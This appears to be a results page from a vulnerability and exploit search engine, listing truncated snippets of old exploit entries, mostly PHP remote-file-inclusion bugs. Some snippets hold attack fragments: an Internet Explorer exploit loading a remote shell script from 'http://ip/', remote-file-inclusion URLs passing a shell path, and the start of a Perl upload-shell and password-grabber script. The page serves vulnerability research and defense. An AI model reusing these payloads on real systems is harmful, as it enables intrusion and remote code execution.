CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

Exploit DB•added 2008/10/27 12:0 a.m.•18 views

bcoos 1.0.13 - 'common.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/31929/info The 'bcoos' program is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it i...

seebug.org•added 2008/06/05 12:0 a.m.•17 views

MS Internet Explorer Remote Application.Shell Exploit

No description provided by source. html body script language="Javascript" function InjectedDuringRedirection showModalDialog'md.htm',window,"dialogTop:-10000;dialogLeft:-10000;dialogHeight:1; dialogWidth:1;".location="vbscript:"SCRIPT SRC='http://ip/shellscriptloader.js'/script""; /script...

seebug.org•added 2008/06/05 12:0 a.m.•165 views

MS Internet Explorer Remote Wscript.Shell Exploit

No description provided by source. ----------------------------------------------------- default.htm ------------------------------------------------------- html body img src="cc.exe" width=0 height=0 style=display:none script language="Javascript" function InjectedDuringRedirection...

seebug.org•added 2008/06/03 12:0 a.m.•9 views

Softpedia SiteXS CMS 0.1.1 Arbitrary File Upload Vulnerability

No description provided by source. SiteXS CMS Remote File Upload Vulnerability Discovered by : Ciph3r E-Mail : [email protected] CMS: sitexs-0.1.1 CMS All Version Vulnerable Download CMS : http://dfn.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz Sp TANX4 : google.com ;...

exploitpack•added 2008/01/21 12:0 a.m.•11 views

Lama Software 14.12.2007 - Multiple Remote File Inclusions

Lama Software 14.12.2007 - Multiple Remote File Inclusions +----------------------------------------------------------------------------+ Lama Software kostenlos Remote file include Scripts : Lama Software kostenlos Discovered By : QTRinux Scripts site : http://www.lama-software.de/ Thanks To :...

0.2AI score

seebug.org•added 2007/12/11 12:0 a.m.•20 views

MonAlbum 0.87 Upload Shell / Password Grabber Exploit

No description provided by source. !/usr/bin/env perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Std; my %args, $user, $password, $sqlhost, $sqluser, $sqlpassword, $cookie, $path, $file, $upload = ; my $tmp = 'cmd1.jpg'; getopts"u:a:f:p:", %args; -a don't...

seebug.org•added 2007/11/17 12:0 a.m.•15 views

sk.log v0.5.3 Remote File Inclusion

++++++++++++++++++++++++++++++++++++++++++++++++++ + sk.log v0.5.3 Remote File Inclusion + High Risk + Found by Seph1roth + http://blackroots.it ++++++++++++++++++++++++++++++++++++++++++++++++++ + Vulnerable Code + log.inc.php + includeonce "$SKINURL/php/logdisplay.inc.php" ; sk.log v0.5.3 暂无...

7.3AI score

seebug.org•added 2007/10/07 12:0 a.m.•75 views

ELSE IF CMS 0.6 Multiple Remote Vulnerabilities / Exploit

No description provided by source. ELSEIF CMS Tested on "Else If version Beta 0.6" Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] These Are Examples .. iam tiered fetching the injected files : Remote File inclusion...

Exploit DB•added 2007/10/06 12:0 a.m.•38 views

Else If CMS 0.6 - Multiple Vulnerabilities

ELSEIF CMS Tested on "Else If version Beta 0.6" Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] These Are Examples .. iam tiered fetching the injected files : Remote File inclusion elseif/contenus.php?contenus=Shell...

seebug.org•added 2007/05/21 12:0 a.m.•17 views

Build It Fast远程文件包含漏洞

Build It Fast是一款基于PHP的WEB应用程序。 Build It Fast不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。问题是多个脚本对用户提交的'sysdir'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 Build it Fast 0.4.1 目前没有解决方案提供： http://bif.lunix.com.ar/ http://www.example.com/Base/Application.php?peardir=Shell...

Exploit DB•added 2007/05/04 12:0 a.m.•39 views

Persism CMS 0.9.2 - system[path] Remote File Inclusion

Persism Content Management System = 0.9.2 Multiple Remote File Inclusion Vulnerabilities D.Script: http://www.persism.com/emil/0.9.2/0.9.2.tar.gz Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc Exploit:Path/modules/blocks/headerfile.php?systempath=Shell...

7AI score

exploitpack•added 2007/04/25 12:0 a.m.•10 views

DynaTracker 1.5.1 - action.php?base_path Remote File Inclusion

DynaTracker 1.5.1 - action.php?basepath Remote File Inclusion source: https://www.securityfocus.com/bid/23667/info DynaTracker is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to...

0.3AI score

securityvulns•added 2007/04/19 12:0 a.m.•49 views

osp <= 1.2.1 (cfgPathToProjectAdmin) Remote File Include Vulnerablities

osp = 1.2.1 cfgPathToProjectAdmin Remote File Include Vulnerablities D.Script: http://nlcac.internationalstudents.asn.au/osp1.01RC1.tar http://sourceforge.net/projects/osp/ latest Discovered by: Alkomandoz Hacker Homepage: http://www.asb-may.net & TrYaG.CoM & MoHaNdKo.CoM Exploit:...

1AI score

Packet Storm•added 2007/03/29 12:0 a.m.•21 views

datadomain-exec.txt

SUMMARY ======= An arbitrary command execution vulnerability exists in the command line administration interface of the software used by DataDomain appliances. An attacker who is able to access the administration interface could exploit this vulnerability to install malicious software and use the...

Exploit DB•added 2006/09/28 12:0 a.m.•41 views

AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Remote Buffer Overflow

source: https://www.securityfocus.com/bid/6853/info A vulnerability has been discovered in multiple vendor implementations of the 'gethostbyname' library function, which is used to resolve network addresses. The 'gethostbyname' function fails to implement sufficient bounds checking on data copied...

10CVSS7AI score0.03249EPSS

Exploits3

Exploit DB•added 2006/06/13 12:0 a.m.•20 views

Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/18410/info Simpnews is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PH...

Exploit DB•added 2005/05/31 12:0 a.m.•37 views

ZeroBoard 4.1 - 'preg_replace' Remote Nobody Shell

/ ---------------------------------------------------------------------------------- + Zeroboard pregreplace vulnerability Remote nobody shell exploit ---------------------------------------------------------------------------------- by n0gada [email protected] date : 2005/5/29 the bug Origina...

7AI score

0day.today•added 2005/05/31 12:0 a.m.•40 views

Zeroboard 4.1 preg_replace Remote nobody Shell Exploit

Exploit for unknown platform in category web applications ====================================================== Zeroboard 4.1 pregreplace Remote nobody Shell Exploit ====================================================== /...

Packet Storm•added 2005/05/27 12:0 a.m.•141 views

fusion_v3.6.1_exploit.txt

? $copyr = " !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! oooo...oooo.oooooooo8.ooooooooooo .8888o..88.888........88..888..88 .88.888o88..888oooooo.....888 .88...8888.........888....888 o88o....88.o88oooo888....o888o Network security team nst.void.ru Title: Fusion News v3.6.1...